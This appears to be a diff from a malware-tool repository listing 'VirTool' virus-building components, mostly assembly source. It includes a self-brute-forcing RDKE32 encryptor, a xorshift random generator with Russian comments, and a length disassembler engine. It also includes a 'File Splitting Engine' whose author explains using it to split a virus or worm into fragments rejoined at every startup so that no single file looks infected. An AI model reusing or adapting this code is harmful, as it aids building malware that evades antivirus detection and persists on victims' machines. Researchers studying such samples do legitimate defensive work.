; DWORD dwNumberOfBytesToHashAndEncrypt // number of bytes to hash and
; // encrypt
; DWORD dwSecurityLevel // security level
; );
;
; Parameters
; lpHash
; [out] Pointer to the buffer that receives the hash.
; lpBuffer
; [out] Pointer to the buffer containing the data to be hashed and encrypted.
; dwNumberOfBytesToHashAndEncrypt
; [in] Specifies the number of bytes to be hashed and encrypted.
; dwSecurityLevel
; [in] Specifies the security level of the encryption. The higher it is the
; longer it will take for RDKE32Decrypt to bruteforce and decrypt the
; encrypted data.
;
; Return Values
; This function does not return a value.
RDKE32Encrypt proc ; Random Decoding Key Engine 32-bit
; v 1.00 [RDKE32] encryptor
pushad
mov edi,[esp._lpHash+size _pushad+04h]
; Pointer to the buffer that receives
; the hash
mov ebx,[esp._lpBuffer+size _pushad+04h]
; Pointer to the buffer containing the
; data to be hashed and encrypted
mov ecx,[esp._dwNumberOfBytesToHashAndEncrypt+size _pushad+04h]
; Specifies the number of bytes to be
; hashed and encrypted
mov eax,[esp._dwSecurityLevel+size _pushad+04h]
; Specifies the security level
call SHA1, edi, ecx, ebx
insecure_key:
call GetRandomNumberWithinRange
call test_key_security
jz insecure_key
call cryptor
popad
ret size _RDKE32Encrypt
endp
; RDKE32Decrypt
;
;
; The RDKE32Decrypt function creates a hash and encrypts data.
;
; VOID RDKE32Decrypt(
; LPVOID lpHash // data buffer of hash
; LPVOID lpBuffer // data buffer of data to decrypt
; DWORD dwNumberOfBytesToDecrypt // number of bytes to decrypt
; );
;
; Parameters
; lpHash
; [in] Pointer to the buffer containing the hash.
; lpBuffer
; [out] Pointer to the buffer containing the data to decrypted.
; dwNumberOfBytesToDecrypt
; [in] Specifies the number of bytes to be decrypted.
;
; Return Values
; This function does not return a value.
RDKE32Decrypt proc ; Random Decoding Key Engine 32-bit
; v 1.00 [RDKE32] decryptor
pushad
mov edi,[esp._lpHash+size _pushad+04h]
; Pointer to the buffer of the hash
mov ebx,[esp._lpBuffer+size _pushad+04h]
; Pointer to the buffer containing the
; data to be decrypted
mov ecx,[esp._dwNumberOfBytesToDecrypt+size _pushad+04h]
; Specifies the number of bytes to be
; decrypted
sub esp,hash_size
mov esi,esp ; ESI = pointer to the hash
xor edx,edx
bruteforce_loop:
inc edx ; EDX = 32-bit encryption/decryption
; key
call test_key_security
jz bruteforce_loop
call cryptor
call SHA1, esi, ecx, ebx
pushad
push (hash_size/04h)
pop ecx
rep cmpsd ; Succesfully decrypted the buffer to
; be decrypted?
popad
je RDKE32Decrypt_exit
call cryptor
jmp bruteforce_loop
RDKE32Decrypt_exit:
add esp,hash_size
popad
ret size _RDKE32Decrypt
endp
test_key_security proc ; Test the security of the 32-bit key
pushad
test eax,eax ; Insecure key?
jz test_key_exit
push 03h
pop ecx
test_key_loop:
mov eax,edx ; EDX = 32-bit encryption/decryption
; key
mov ebx,ecx
_test_key_loop:
rol eax,08h
test al,dl
jz test_next_key
cmp al,dl ; Insecure key?
je test_key_exit
test_next_key:
dec ebx
jnz _test_key_loop
rol edx,08h
loop test_key_loop
inc ecx ; Secure key
test_key_exit:
popad
ret
endp
cryptor proc ; 32-bit encryptor/decryptor
pushad
crypt_loop:
inc ecx
test dl,dl ; Insecure key?
jz dont_crypt
dec ecx
xor [ebx],dl
inc ebx
dont_crypt:
rol edx,08h
loop crypt_loop
popad
ret
endp
db ' [RDKE32] '
rdke32_end:
rdke32_size equ (rdke32_end-rdke32_begin)

96
libs/VirTool.Win32.Cryptor.Rgen32.asm Normal file
View File

@ -0,0 +1,96 @@
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
; ГЕНЕРАТОР СЛУЧАЙНОГО ЧИСЛА V. 0.42 (x) 2005 СЛОН ;
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
; Интервал: [0..eax-1] ;
;------------------------------------------------------------------------------;
; Используется алгоритм ГПСЧ Джорджа Марсаглии - "Xorshift - 128" ;
; Данный алгоритм прошел тест DIEHARD его период 2^128-1 ;
;------------------------------------------------------------------------------;
; Использование: call r_init ;
; mov eax,ГРАНИЦА ИНТЕРВАЛА ;
; call brandom32 ;
;------------------------------------------------------------------------------;
; Результат: число в интервале [0..ГРАНИЦА ИНТЕРВАЛА] ;
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
;----[Подпрограмма инициализации генератора случайных чисел]-------------------;
r_init:
push ebp eax edx ; Сохраняем в стэке ebp,eax,edx
call __delta1_ ;
__delta1_: pop ebp ; Получение дельта смещения
sub ebp,offset __delta1_ ;
db 0fh,031h ; Получаем случайное зерно
mov [ebp+x],eax ;
pop edx eax ebp ; Восстанавливаем edx,eax,ebp
ret ; Возврат из подпрограммы
;----[Подпрограмма генерации случаного чмсла в диапазоне]----------------------;
brandom32: ; Эта подпрограмма
; возвращает случайное число
; в диапазоне 0..eax-1
push edx ecx ebp ; Сохраняем в стэке edx,ecx,ebp
call __delta2_ ;
__delta2_: pop ebp ; Получение дельта смещения
sub ebp,offset __delta2_ ;
imul eax,eax,100 ; Умножаем eax на 100
push eax ; и сохраняем eax в стэке
call random32 ; Вызываем подпрограмму
; генерации случайного числа
xor edx,edx ; Обнуляем edx
pop ecx ; Восстанавливаем значение
; из стэка в ecx
div ecx ; Делим eax на ecx
xchg eax,edx ; Помещаем остаток в eax
xor edx,edx ; Обнуляем edx
push 100 ; Помещаем в ecx - 100
pop ecx ;
div ecx ; Делим eax на ecx
pop ebp ecx edx ; Восстанавливаем ebp,ecx,edx,
ret ; Возврат из подпрограммы
;----[Подпрограмма генерации случайного числа]---------------------------------;
random32:
push ebx edx ecx ;
push ebp ; Сохраняем регистры в стэке
call __delta3_ ;
__delta3_: pop ebp ; Получение дельта смещения
sub ebp,offset __delta3_ ;
mov eax,12345678 ;
x = dword ptr $-4 ;
shl eax,0bh ; Выполняем математические
xor eax,[ebp+x] ; преобразования по нужному нам
mov edx,362436069 ; алгоритму данная часть
y = dword ptr $-4 ; выглядела бы на С так:
mov [ebp+x],edx ; unsigned long x=123456789,
mov ecx,521288629 ; y=362436069,
z = dword ptr $-4 ; z=521288629,
mov [ebp+y],ecx ; w=88675123;
mov ebx,88675123 ; t=(x^(x<<11));x=y;y=z;z=w;
w = dword ptr $-4 ; Где t в нашем случае eax
mov [ebp+z],ebx ;
mov edx,[ebp+w] ; Далее идут следующие
shr edx,13h ; вычисления, которые дают СЧ
xor edx,[ebp+w] ; (w=(w^(w>>19))^(t^(t>>8)));
xor edx,eax ;
shr eax,08h ;
xor edx,eax ;
mov [ebp+w],edx ;
mov eax,edx ;
pop ebp ;
pop ecx edx ebx ; Вынимаем регистры из стэка
retn ; Возврат из подпрограммы

BIN
libs/VirTool.Win32.Cryptor.SetG.7z Normal file
View File

Binary file not shown.

302
libs/VirTool.Win32.Cryptor.Split.asm Normal file
View File

@ -0,0 +1,302 @@
File Splitting Engine
by Second Part To Hell
www.spth.de.vu
spth@priest.com
written in May-June 2005
in Austria
This is just a small engine, but I'm sure it could be very useful.
What does the engine do? It splitts the current file into 3-10 byte
parts and creates a joining file (called start.bat).
To understand it's purpose, you should read my article called
"Over-File Splitting".
What could you do with the splitted files?
- You could make an archive (via own routing, possible installed WinZIP/RAR
or use the WinME+ preinstalled function [C:\WINDOWS\System32\zipfldr.dll,-10195]
to compress files.) This file now could be send out via eMail.
The advantage: No file is infected with an virus - but all together they are.
- You could save all files in a directory (Windir, system32, whatever), and
call the joining file every startup. What may happen? Virus/Worm works at
the computer, but no file is infected :)
- You could think of your own way to use this technique. Lazy ass :)
How to compile:
- Delete this intro
- Use flat assembler 1.56
Now: Much fun with it :)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; [File Splitting Engine] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
include '..\FASM\INCLUDE\win32ax.inc'
.data
c_file_name dd 0x0
c_file_rnd_name: times 8 db 0x0
db '.tmp',0
c_file_handle dd 0x0
c_file_size dd 0x0
c_map_handle dd 0x0
c_map_pointer dd 0x0
compain_name db 'start.bat',0
compain_data dd 0x0
compain_pointer dd 0x0
compain_start db 'copy '
compain_handle dd 0x0
split_handle dd 0x0
split_counter db 0x0
rand_name_buffer: times 8 db 0x0
rnd_file_name: times 8 db 0x0
db '.tmp',0
ZERO_field dd 0x0
systemtime_struct: ; for random number
dw 0 ; wYear
dw 0 ; wMonth
dw 0 ; wDayOfWeek
dw 0 ; wDay
dw 0 ; wHour
dw 0 ; wMinute
dw 0 ; wSecond
rnd: dw 0 ; wMilliseconds
.code
start:
invoke GetCommandLine
inc eax ; Delete first "
mov ebx, eax ; Save eax
get_my_name:
inc ebx ; Get next letter
cmp byte [ebx], '.' ; Compare with '.'
jne get_my_name
mov byte [ebx+4], 0x0 ; Delete the second "
mov [c_file_name], eax ; Save the pointer
invoke DeleteFile, compain_name ; Delete the old compainer-file the file
mov ebp, 0xAAAAAAAA ; Influences the random engine
call random_name ; random name in rnd_file_name
mov esi, rnd_file_name ; From: random-name buffer
mov edi, c_file_rnd_name ; To: Buffer for this copy of the file
mov ecx, 8 ; How much: 8 letters
rep movsb ; Copy string
invoke CopyFile, [c_file_name], c_file_rnd_name, FALSE ; Copies the current file to a .tmp
invoke CreateFile, c_file_rnd_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0x0 ; Open own file
mov [c_file_handle], eax ; Save the file handle
invoke GetFileSize, [c_file_handle], c_file_size ; Get the size of the file
mov [c_file_size], eax ; Low Filesize returned in eax
invoke CreateFileMapping, [c_file_handle], 0x0, PAGE_READWRITE, 0x0, [c_file_size], 0x0 ; Create a Map
mov [c_map_handle], eax ; Save the Map handle
invoke MapViewOfFile, [c_map_handle], FILE_MAP_WRITE, 0x0, 0x0, [c_file_size] ; Map view of file
mov [c_map_pointer], eax ; Save the pointer of file
invoke VirtualAlloc, 0x0, 0x120000, 0x1000, 0x4 ; Reserve Space in Memory
mov [compain_data], eax ; Save the pointer to it.
mov [compain_pointer], eax ; Save again
mov esi, compain_start ; What to write
mov edi, [compain_pointer] ; Where to write
mov ecx, 5 ; How much to write
rep movsb ; Write!
add [compain_pointer], 5 ; Get next empty byte to write
main_loop:
mov ebp, 0xAAAAAAAA ; Influences the random engine
call random_name ; random name in rnd_file_name
invoke CreateFile, rnd_file_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0x0
cmp eax, INVALID_HANDLE_VALUE ; If file already existed
je main_loop ; then get a new file-name
mov [split_handle], eax ; Save the file-handle
call random_number ; Get random number
xor eax, eax ; eax=0
mov al, [rand_name_buffer] ; al~=random
and al, 7 ; al= 0000 0???
add al, 3 ; At least three byte
mov [split_counter], al ; Save that bytes
sub [c_file_size], eax ; Decrease the bytes to write
invoke WriteFile, [split_handle], [c_map_pointer], eax, ZERO_field, 0x0 ; Write (1..8) byte
invoke CloseHandle, [split_handle] ; Close the file
xor eax, eax
mov al, [split_counter] ; How many bytes written
add [c_map_pointer], eax ; Add the pointer - write the next few bytes next time
mov esi, rnd_file_name ; From: Filename-buffer
mov edi, [compain_pointer] ; To: compainer-pointer
mov ecx, 12 ; 8+strlen('.tmp')
rep movsb ; Write!
add [compain_pointer], 12 ; Add 12 to pointer
mov eax, [compain_pointer] ; Pointer to eax
mov byte [eax], '+' ; Move '+' to the code's memory
inc [compain_pointer] ; Increase the pointer
cmp [c_file_size], 0 ; Compare if more bytes to write
jg main_loop ; If yes, jmp to main_loop
invoke UnmapViewOfFile, [c_map_pointer] ; Unmap View of File
invoke CloseHandle, [c_map_handle] ; Close Map
invoke CloseHandle, [c_file_handle] ; Close File
invoke DeleteFile, c_file_rnd_name ; Delete the temporary copy of the current file
invoke CreateFile, compain_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0x0
mov [compain_handle], eax
mov eax, [compain_pointer] ; eax=pointer
dec eax ; Delete the last '+'
mov byte [eax], 0x20 ; Add a space
inc [compain_pointer] ; Increase pointer again
mov ebp, 0xAAAAAAAA ; Influences the random engine
call random_name ; random name in rnd_file_name
mov eax, rnd_file_name ; RND-pointer in eax
add eax, 8 ; add 8 to pointer (='.' of filename)
mov dword [eax], '.exe' ; instate of '.tmp', '.exe'
dec [compain_pointer]
mov esi, rnd_file_name ; From: rnd_file_name
mov edi, [compain_pointer] ; To: compainter_pointer
mov ecx, 12 ; How much: 12 bytes
rep movsb ; Write
add [compain_pointer], 12 ; Add 12, to get the end again
mov eax, [compain_pointer] ; eax=pointer to content
mov word [eax], 0x0A0D ; Next Line
add [compain_pointer], 2
mov esi, rnd_file_name ; From: rnd_file_name
mov edi, [compain_pointer] ; To: compainter_pointer
mov ecx, 12 ; How much: 12 bytes
rep movsb ; Write
add [compain_pointer], 12 ; Add 12, to get the end again
mov eax, [compain_data]
sub [compain_pointer], eax
invoke WriteFile, [compain_handle], [compain_data], [compain_pointer], ZERO_field, 0x0 ; Write the file
invoke CloseHandle, [compain_handle]
invoke ExitProcess, 0x0
random_number:
pop edi ; Get value of stack
push edi ; Back to the stack
mov ecx, 8 ; ecx=counter
mov dh, 0xAA ; dh: changes in the function and makes the number little bit more random
mov dl, 0x87 ; same as dh
random_name_loop:
push dx ; Save dx at stack
push ecx ; Save counter at stack
call random_byte ; Random number in al
pop ecx ; get counter
xor al, cl ; Counter influences pseudo random number
pop dx ; Get dx
push ecx
xor dx, cx ; Counter influences influncing number
add dh, al ; Random number influences influencing number
sub dl, al ; Same as dh
neg dl ; Neg dl
xor dl, dh ; dl XOR dh -> more variability
xor al, dl ; random number changes
sub ax, di ; value of stack influences random number
add ax, dx ; ax+dx
mov dl, [rand_name_buffer+ecx-2]
mov dh, [rand_name_buffer+ecx-3] ; dx=???? ???? ????? ?????
sub al, dl ; al-=dl
add al, dh ; al+=dh
mov ah, dl ; ah=dl
push ax ; AX to stack
mov cl, 1 ; cl=1
or dh, cl ; dh is at least 1 (to reduce chance of result=zero)
mul dh ; AL=AX*DH
pop cx ; CX=old AX
push cx ; To stack again
add cl, al ; CL+=AL
sub cl, ah ; CL-=AH
xchg al, cl ; AL=CL
mov cx, bp ; cx=bp
mul cl ; AX=AL*CL
neg ah ; NEG AH
xor al, ah ; xor AL and AH
pop cx ; get old AX
sub cl, al ; SUB
add cl, dl ; cl+=old random number
sub al, cl ; al ~=random :)
pop ecx ; Get counter
mov [rand_name_buffer+ecx-1], al ; Save random letter
loop random_name_loop
ret
random_name:
call random_number ; Get 8 random bytes
mov ecx, 8 ; counter=8, as we want to do it 8 times
changetoletter:
mov al, [rand_name_buffer+ecx-1] ; Get a letter
mov bl, 10 ; BL=10
xor ah, ah ; AX: 0000 0000 ???? ????
div bl ; AL=rnd/10=number between 0 and 25
add al, 97 ; Add 97 for getting lowercase letters
mov [rnd_file_name+ecx-1], al ; Save random letter
loop changetoletter
ret
random_byte:
invoke GetSystemTime, systemtime_struct ; Get first number
mov ebx, [rnd-2] ; ebx=number
add ebx, edx ; Making it pseudo-independent of time
sub ebx, ecx
xor ebx, eax
xchg bl, bh
pop ecx
push ecx
neg ebx
xor ebx, ecx ; ebx=pseudo-indepentend number
invoke GetTickCount ; Get second number
xor eax, ecx ; eax=number
neg ax ; Making it pseudo-independent of time
xor eax, edx
xor ah, al
sub eax, ebp
add eax, esi ; eax=pseudo-indepentend number
xor eax, ebx ; Compain the numbers -> eax
mov ebx, eax ; Save eax
shr eax, 8 ; e-part -> ax
xor ax, bx
xor al, ah ; al=number
ret
.end start

1175
libs/VirTool.Win32.Cryptor.Wig.asm Normal file
View File

File diff suppressed because it is too large Load Diff

BIN
libs/VirTool.Win32.Cryptor.Yspe.7z Normal file
View File

Binary file not shown.

901
libs/VirTool.Win32.Disassembler.4553_LDE.txt Normal file
View File

@ -0,0 +1,901 @@
/*
*
* ____| | | _) ___| |
* __| | _ \ __| __| __| _ \ __ \ | __|\___ \ _ \ | | | __|
* | | __/ ( | | ( | | | | ( | ( | | | |\__ \
* _____|_|\___|\___|\__|_| \___/ _| _|_|\___|_____/ \___/ \____|_|____/
*
* Presents
*
* [ 0x4553_LDE - 16/32-bit Length Disassembler Engine ]
*
* (c) Ares, 2003
*
*[-----------------------------------------------------------------------------------]
* Description:
* It based on ADE32 disassembler engine by z0mbie, modified and ported to AT&T asm.
*
* table.h - contain table of opcodes from 0x00 to 0xFF,
* it define the type of each other.
*
* Usage:
* There is the main function l_disasm(). It get one parameter from stack,
* which point to array with data. Return value reside in %eax - length of opcode.
*
* Example:
* ...
* mov data,%eax
* add $123,%eax # data[123]
* push %eax
* call l_disasm
* ...
*
* Section Headers:
* [Nr] Name Type Addr Off Size ES Flg Lk Inf Al
* [ 0] NULL 00000000 000000 000000 00 0 0 0
* [ 1] .text PROGBITS 08048074 000074 0002c2 00 AX 0 0 4
* [ 2] .data PROGBITS 08049380 000380 000800 00 WA 0 0 4
* ...
* = AA5(hex) = 2725(dec)
*
*[-----------------------------------------------------------------------------------]
*
* version: 1.0BETA
*
*/
.include "table.h"
.text
# little defines
diza = 12
buffer = -4
flag1 = -52
flag2 = -51
opcode = -53
t = -60
mod = -61
rm = -62
a = -68
b = -72
counter = -76
.globl l_disasm
l_disasm:
pushl %ebp
movl %esp,%ebp
movl 8(%ebp),%eax
movl %eax,buffer(%ebp) # buf
leal -48(%ebp),%eax # temp diza structure
movl %eax,diza(%ebp) # diza
movb $4,1(%eax) # filling structure
movb $4,(%eax)
movl $0,flag1(%ebp) # flag1 = 0
loop:
movl buffer(%ebp),%eax
movb (%eax),%dl
movb %dl,opcode(%ebp) # opcode
incl buffer(%ebp) # buf++;
movzbl opcode(%ebp),%eax
leal 0(,%eax,4),%edx
movl $op_tab,%eax
movl (%edx,%eax),%edx
movl %edx,t(%ebp) # t = op_tab[opcode]
movb t(%ebp),%al
andb $0xF8,%al
testb %al,%al
je check_opcode
movl flag1(%ebp),%eax
andl t(%ebp),%eax
testl %eax,%eax
jne return
movl t(%ebp),%edx
orl %edx,flag1(%ebp)
# prefix/mod/rm/flags/opcodes...checking
# no reason to comment all this stuff...
check_prefix:
movb t(%ebp),%al
test %esi,%esi
jne chp1
andb $0x10,%al
testb %al,%al
je chp1
jmp chpn
chp1:
movb t(%ebp),%al
incl %esi
andb $0x20,%al
testb %al,%al
je cp_sub2
chpn:
movl diza(%ebp),%eax
movl diza(%ebp),%edx
movb 1(%edx),%cl
xorb $6,%cl
movb %cl,1(%eax)
jmp loop
cp_sub2:
movb t(%ebp),%al
andb $0x80,%al
testb %al,%al
je cp_sub3
movl diza(%ebp),%eax
movb opcode(%ebp),%dl
movb %dl,21(%eax)
jmp loop
cp_sub3:
movb t(%ebp),%al
andb $0x40,%al
testb %al,%al
je loop
movl diza(%ebp),%eax
movb opcode(%ebp),%dl
movb %dl,20(%eax)
check_opcode:
movl t(%ebp),%eax
orl %eax,flag1(%ebp)
movl diza(%ebp),%eax
movb opcode(%ebp),%dl
movb %dl,22(%eax)
cmpb $15,opcode(%ebp)
jne co_sub1
movl buffer(%ebp),%ebx
movb (%ebx),%al
movb %al,opcode(%ebp)
incl buffer(%ebp)
movl diza(%ebp),%eax
movb opcode(%ebp),%dl
movb %dl,23(%eax)
movzbl opcode(%ebp),%eax
leal 256(%eax),%edx
leal 0(,%edx,4),%eax
movl $op_tab,%edx
movl (%eax,%edx),%ecx
orl %ecx,flag1(%ebp)
cmpl $-1,flag1(%ebp)
jne check_mod
jmp return
co_sub1:
cmpb $0xF7,opcode(%ebp)
jne co_sub2
movl buffer(%ebp),%eax
movb (%eax),%dl
andb $0x38,%dl
testb %dl,%dl
jne check_mod
orb $0x20,flag2(%ebp)
jmp check_mod
co_sub2:
cmpb $0xF6,opcode(%ebp)
jne check_mod
movl buffer(%ebp),%eax
movb (%eax),%dl
andb $0x38,%dl
testb %dl,%dl
jne check_mod
orb $1,flag2(%ebp)
check_mod:
movl flag1(%ebp),%eax
andl $0x4000,%eax
testl %eax,%eax
je checks_complete
movl buffer(%ebp),%edi
movb (%edi),%al
movb %al,opcode(%ebp)
incl buffer(%ebp)
movl diza(%ebp),%eax
movb opcode(%ebp),%dl
movb %dl,24(%eax)
movb opcode(%ebp),%al
andb $0x38,%al
cmpb $0x20,%al
jne cm_sub1
movl diza(%ebp),%eax
cmpb $0xFF,22(%eax)
jne cm_sub1
orb $4,-50(%ebp) # flag
cm_sub1:
movb opcode(%ebp),%al
andb $0xC0,%al
movb %al,mod(%ebp)
movb opcode(%ebp),%dl
andb $7,%dl
movb %dl,rm(%ebp)
cmpb $0xC0,mod(%ebp)
je checks_complete
movl diza(%ebp),%eax
cmpb $4,(%eax)
jne cm_sub5
cmpb $4,rm(%ebp)
jne cm_sub2
orb $8,flag2(%ebp)
movl buffer(%ebp),%edi
movb (%edi),%al
movb %al,opcode(%ebp)
incl buffer(%ebp)
movl diza(%ebp),%eax
movb opcode(%ebp),%dl
movb %dl,25(%eax)
movb opcode(%ebp),%cl
andb $7,%cl
movb %cl,rm(%ebp)
cm_sub2:
cmpb $0x40,mod(%ebp)
jne cm_sub3
orb $1,flag1(%ebp)
jmp checks_complete
cm_sub3:
cmpb $0x80,mod(%ebp)
jne cm_sub4
orb $4,flag1(%ebp)
jmp checks_complete
cm_sub4:
cmpb $5,rm(%ebp)
jne checks_complete
orb $4,flag1(%ebp)
jmp checks_complete
cm_sub5:
cmpb $0x40,mod(%ebp)
jne cm_sub6
orb $1,flag1(%ebp)
jmp checks_complete
cm_sub6:
cmpb $0x80,mod(%ebp)
jne cm_sub7
orb $2,flag1(%ebp)
jmp checks_complete
cm_sub7:
cmpb $6,rm(%ebp)
jne checks_complete
orb $2,flag1(%ebp)
checks_complete:
movl diza(%ebp),%eax
movl flag1(%ebp),%edx
movl %edx,8(%eax)
movl flag1(%ebp),%eax
andl $7,%eax
movl %eax,a(%ebp)
movl flag1(%ebp),%edx
andl $0x700,%edx
shrl $8,%edx
movl %edx,b(%ebp)
movl flag1(%ebp),%eax
andl $0x1000,%eax
testl %eax,%eax
je cc_sub1
movl diza(%ebp),%eax
movzbl (%eax),%edx
addl %edx,a(%ebp)
cc_sub1:
movl flag1(%ebp),%eax
andl $0x2000,%eax
testl %eax,%eax
je cc_sub2
movl diza(%ebp),%eax
movzbl 1(%eax),%edx
addl %edx,b(%ebp)
cc_sub2:
movl diza(%ebp),%eax
movl a(%ebp),%edx
movl %edx,diza(%eax)
movl diza(%ebp),%eax
movl b(%ebp),%edx
movl %edx,16(%eax)
movl $0,counter(%ebp)
cc_sub3:
movl counter(%ebp),%eax
cmpl a(%ebp),%eax
jnb cc_sub4
movl diza(%ebp),%edx
leal 28(%edx),%eax
movl counter(%ebp),%edx
movl buffer(%ebp),%ecx
movl %ecx,(%edx,%eax)
incl buffer(%ebp)
incl counter(%ebp)
jmp cc_sub3
cc_sub4:
movl $0,counter(%ebp)
cc_sub5:
movl counter(%ebp),%eax
cmpl b(%ebp),%eax
jnb cc_sub6
movl diza(%ebp),%edx
leal 36(%edx),%eax
movl counter(%ebp),%edx
movl buffer(%ebp),%ecx
movl %ecx,(%edx,%eax)
incl buffer(%ebp)
incl counter(%ebp)
jmp cc_sub5
cc_sub6:
movl buffer(%ebp),%eax
subl 8(%ebp),%eax
return:
leave
ret
/****************************************************
.include "0x4553_LDE.s"
.globl main
main:
push %ebp
mov %esp,%ebp
push $2
push $file
call open
mov %eax,fd
push $424
call malloc
mov %eax,data
push $424
push data
push fd
call read
mov data,%eax
add $0x74,%eax # entry point, first instruction - xor %eax,%eax
push %eax
call l_disasm
push %eax
push $l
call printf
call exit
l:.string"Lenght of instruction: %d\n"
file: .string "test"
.comm fd,4,4
.comm data,424,4
*****************************************************/
/****************************************************
table.h
.globl op_tab
.data
op_tab:
.long 16384 # 0x00
.long 16384 # 0x01
.long 16384 # 0x02
.long 16384 # ...
.long 256
.long 8192
.long 32768
.long 32768
.long 16384
.long 16384
.long 16384
.long 16384
.long 256
.long 8192
.long 32768
.long 65536
.long 49152
.long 16384
.long 49152
.long 16384
.long 33024
.long 40960
.long 32768
.long 32768
.long 49152
.long 16384
.long 16384
.long 16384
.long 33024
.long 40960
.long 32768
.long 32768
.long 16384
.long 16384
.long 16384
.long 16384
.long 256
.long 8192
.long 32896
.long 32768
.long 16384
.long 16384
.long 16384
.long 16384
.long 256
.long 8192
.long 32896
.long 32768
.long 16384
.long 16384
.long 16384
.long 16384
.long 256
.long 8192
.long 32896
.long 32768
.long 16384
.long 16384
.long 16384
.long 16384
.long 256
.long 8192
.long 32896
.long 32768
.long 0
.long 0
.long 0
.long 0
.long 32768
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 32768
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 0
.long 32768
.long 0
.long 0
.long 0
.long 32768
.long 32768
.long 49152
.long 49152
.long 128
.long 32896
.long 32
.long 16
.long 8192
.long 24576
.long 256
.long 16640
.long 32768
.long 32768
.long 32768
.long 32768
.long 164096
.long 164096
.long 131328
.long 131328
.long 131328
.long 131328
.long 131328
.long 131328
.long 131328
.long 131328
.long 164096
.long 164096
.long 131328
.long 131328
.long 131328
.long 131328
.long 16640
.long 24576
.long 49408
.long 16640
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 49152
.long 16384
.long 49152
.long 16384
.long 0
.long 0
.long 0
.long 32768
.long 32768
.long 32768
.long 32768
.long 32768
.long 32768
.long 0
.long 41472
.long 0
.long 32768
.long 32768
.long 32768
.long 32768
.long 4096
.long 4096
.long 4096
.long 4096
.long 0
.long 0
.long 0
.long 0
.long 256
.long 8192
.long 0
.long 0
.long 0
.long 32768
.long 0
.long 32768
.long 256
.long 256
.long 256
.long 256
.long 256
.long 256
.long 33024
.long 33024
.long 8192
.long 8192
.long 8192
.long 8192
.long 40960
.long 8192
.long 8192
.long 8192
.long 16640
.long 16640
.long 262656
.long 262144
.long 49152
.long 49152
.long 16640
.long 24576
.long 768
.long 0
.long 295424
.long 294912
.long 32768
.long 256
.long 32768
.long 294912
.long 16384
.long 16384
.long 16384
.long 16384
.long 33024
.long 33024
.long 32768
.long 32768
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 164096
.long 164096
.long 131328
.long 131328
.long 33024
.long 33024
.long 33024
.long 33024
.long 139264
.long 401408
.long 41472
.long 393472
.long 32768
.long 32768
.long 32768
.long 32768
.long 32776
.long 32768
.long 64
.long 64
.long 32768
.long 32768
.long 16384
.long 16384
.long 0
.long 0
.long 32768
.long 32768
.long 0
.long 0
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long -1
.long -1
.long 0
.long -1
.long 0
.long 0
.long 0
.long 0
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 139264
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 0
.long 0
.long 0
.long 16384
.long 16640
.long 16384
.long -1
.long -1
.long 0
.long 0
.long 0
.long 16384
.long 16640
.long 16384
.long -1
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long -1
.long -1
.long 16640
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long 16384
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long 0
.long 0
.long 0
.long 0
.long 0
.long 256
.long 0
.long 0
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1
.long -1 # 0xff
*****************************************************/

